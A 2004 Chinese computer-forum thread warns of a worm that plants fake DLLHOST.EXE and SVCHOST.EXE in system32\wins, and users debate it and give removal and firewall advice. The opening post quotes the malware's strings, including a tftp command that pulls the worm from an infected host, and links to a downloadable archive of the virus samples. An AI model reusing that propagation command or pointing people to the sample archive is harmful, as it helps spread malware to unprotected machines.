肝胆相照论坛

 

 

肝胆相照论坛 论坛 电脑技术 存档 1 用2000和XP的小心了
查看: 842|回复: 17

用2000和XP的小心了 [复制链接]

Rank: 6Rank: 6

现金
1854 元 
精华
帖子
873 
注册时间
2003-9-30 
最后登录
2019-2-21 
1
发表于 2004-1-7 17:34
如果大家在自己 的system32 目录里的WINS目录里发现DLLHOST.EXE 和SVCHOST.EXE那么你肯定中毒了。。请自己在启动里删除。。并且删除这2个文件。。传染比较快。。希望大家安装防护墙,,这是中国人自己编译的病毒

DLLHOST.EXE里面有这样的话!
=========== I love my wife & baby ~~~ Welcome Chian~~~ Notice: 2004 will remove myself~~ sorry zhongli~~~=========== wins http://download.microsoft.com/download/6/9...980-x86-KOR.exe ; http://download.microsoft.com/download/5/8...980-x86-CHT.exe ; http://download.microsoft.com/download/2/8...980-x86-CHS.exe ; http://download.microsoft.com/download/0/1...980-x86-ENU.exe ; http://download.microsoft.com/download/e/3...980-x86-KOR.exe ; http://download.microsoft.com/download/2/3...980-x86-CHT.exe ; http://download.microsoft.com/download/a/a...980-x86-CHS.exe ; http://download.microsoft.com/download/9/8...980-x86-ENU.exe ; tftp -i %s get svchost.exe wins\SVCHOST.EXE

如果正常,我就不是人了。。哈哈。。。这2个文件在WINS目录里。。
这决对不是玩笑!!!  我是玩HACK的。。这文件我SNIFF过。。反编译过。。。我是黑客圈里叫[D]KING

如果有什么问题,,,你可以说

说清楚..这2个文件肯定又会给网络安全打一针强心剂!!!!
如果是XP系统,那么这文件应该是在*:\WINDOWS\SYSTEM32\WINS\里
如果是NT系统..比如2000.那么就应该是在*:\winnt\system32\wins\里
这2个文件大家想研究可以在这里下
http://hy88.nease.net/pingvirus.rar

传染是利用TFTP上传的,,如果大家用不上这东东。完全可以删除TFTP.EXE


正常的SVCHOST.EXE是在SYSTEM32目录里...这个2个文件决对不正常,希望大家警惕
如果你的防护墙被PING..那么你那里有一定有机器中了!!

这东西只攻击PING的通的计算机..
奴隶总是以自己的主子为荣。

Rank: 6Rank: 6

现金
1854 元 
精华
帖子
873 
注册时间
2003-9-30 
最后登录
2019-2-21 
2
发表于 2004-1-7 17:42
唉,原来一直以为黑客对普通用户是不会感兴趣的,或许我想的没错,但难免会有一页入门级的菜客用各种工具扫描我们的机器,刚刚换了防火墙,不到5分钟,就有3个ip扫我的端口,以前根本不重视防火墙,现在觉得防火墙比杀毒软件还重要。网络安全得不到保障,我们一定要保护好我们的文件和隐私,大家都赶快去装一个防火墙吧!
奴隶总是以自己的主子为荣。

Rank: 2

现金
96 元 
精华
帖子
37 
注册时间
2004-1-7 
最后登录
2004-11-1 
3
发表于 2004-1-7 23:24
那也许不是病毒
我的理想——喝豆浆吃油条 我的梦想——捡5万块钱 对天说一句:::: 算你狠~~~~~~~ 我的愿望——当一名律师 现在的想法___不要被爸爸妈妈一天骂到黑

Rank: 8Rank: 8

现金
9626 元 
精华
帖子
1590 
注册时间
2004-1-5 
最后登录
2014-11-17 

电脑大牛

4
发表于 2004-1-7 23:24
那两文件是SYSTEM的服务文件哟
而且在补丁里也有DLLHOST.EXE 的
你有没有看清楚呀
呵!呵!
http://bbs.hbvhbv.com/Uploadimages/200511/2005115144213643.jpg

Rank: 6Rank: 6

现金
1854 元 
精华
帖子
873 
注册时间
2003-9-30 
最后登录
2019-2-21 
5
发表于 2004-1-8 00:05
那确实是病毒,只不文件名和系统文件类似比较有欺骗性罢了。
奴隶总是以自己的主子为荣。

Rank: 9Rank: 9Rank: 9

现金
8826 元 
精华
20 
帖子
3214 
注册时间
2003-6-30 
最后登录
2010-3-6 

荣誉之星

6
发表于 2004-1-8 01:19

小心不要误删文件

http://support.microsoft.com/default.aspx?scid=http://support.microsoft.com:80/support/kb/articles/Q250/3/20.ASP&NoWebContent=1


Description of Svchost.exe in Windows 2000
View products that this article applies to.
This article was previously published under Q250320
For a Microsoft Windows XP version of this article, see 314056.

SUMMARY
Svchost.exe is a generic host process name for services that are run from dynamic-link libraries (DLLs). The Svchost.exe file is located in the %SystemRoot%\System32 folder. At startup, Svchost.exe checks the services portion of the registry to construct a list of services that it needs to load. There can be multiple instances of Svchost.exe running at the same time. Each Svchost.exe session can contain a grouping of services, so that separate services can be run depending on how and where Svchost.exe is started. This allows for better control and debugging.

Svchost.exe groups are identified in the following registry key:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Svchost

Each value under this key represents a separate Svchost group and is displayed as a separate instance when you are viewing active processes. Each value is a REG_MULTI_SZ value and contains the services that run under that Svchost group. Each Svchost group can contain one or more service_names extracted from the following registry key, whose Parameters key contains a ServiceDLL value:
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Service

MORE INFORMATION
To view the list of services that are running in Svchost:
From the Windows 2000 installation CD''''s Support\Tools folder, Extract the Tlist.exe utility from the Support.cab file.
On the Start menu, click Run, and then type cmd.
Change folder to the location from which you extracted the Tlist.exe utility.
Type tlist -s.
Tlist.exe displays a list of active processes. The -s switch shows the list of active services in each process. For more information about the process, type tlist pid.

The following sample Tlist output shows two instances of Svchost.exe running:
0 System Process
8 System
132 smss.exe
160 csrss.exe Title:
180 winlogon.exe Title: NetDDE Agent
208 services.exe Svcs: AppMgmt,Browser,Dhcp,dmserver,Dnscache,Eventlog,lanmanserver,LanmanWorkstation,LmHosts,Messenger,PlugPlay,ProtectedStorage,seclogon,TrkWks,W32Time,Wmi
220 lsass.exe Svcs: Netlogon,PolicyAgent,SamSs
404 svchost.exe Svcs: RpcSs
452 spoolsv.exe Svcs: Spooler
544 cisvc.exe Svcs: cisvc
556 svchost.exe Svcs: EventSystem,Netman,NtmsSvc,RasMan,SENS,TapiSrv
580 regsvc.exe Svcs: RemoteRegistry
596 mstask.exe Svcs: Schedule
660 snmp.exe Svcs: SNMP
728 winmgmt.exe Svcs: WinMgmt
852 cidaemon.exe Title: OleMainThreadWndName
812 explorer.exe Title: Program Manager
1032 OSA.EXE Title: Reminder
1300 cmd.exe Title: D:\WINNT5\System32\cmd.exe - tlist -s
1080 MAPISP32.EXE Title: WMS Idle
1264 rundll32.exe Title:
1000 mmc.exe Title: Device Manager
1144 tlist.exe

The registry setting for the two groupings for this example are as follows:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Svchost:
netsvcs: Reg_Multi_SZ: EventSystem Ias Iprip Irmon Netman Nwsapagent Rasauto Rasman Remoteaccess SENS Sharedaccess Tapisrv Ntmssvc
rpcss :Reg_Multi_SZ: RpcSs







[此贴子已经被作者于2004-1-7 11:19:59编辑过]


Rank: 6Rank: 6

现金
1854 元 
精华
帖子
873 
注册时间
2003-9-30 
最后登录
2019-2-21 
7
发表于 2004-1-8 03:03
我早就删了,嘛事没有。system32\wins这个目录里应该是空的。
奴隶总是以自己的主子为荣。

Rank: 4

现金
314 元 
精华
帖子
121 
注册时间
2003-11-5 
最后登录
2008-4-21 
8
发表于 2004-1-8 11:24
同志们平时要做好备份工作。
也能加层保险。

Rank: 4

现金
1181 元 
精华
帖子
720 
注册时间
2001-12-19 
最后登录
2005-3-26 
9
发表于 2004-1-8 22:51
危险呀!
◎挺住意味着一切◎

Rank: 4

现金
703 元 
精华
帖子
239 
注册时间
2003-11-25 
最后登录
2006-10-31 
10
发表于 2004-1-9 07:48
勤打补丁,装个防火墙,杀毒软件,

偶都已经好久没有中过毒了

‹ 上一主题|下一主题

肝胆相照论坛

GMT+8, 2024-11-29 18:41 , Processed in 0.015710 second(s), 12 queries , Gzip On.

Powered by Discuz! X1.5

© 2001-2010 Comsenz Inc.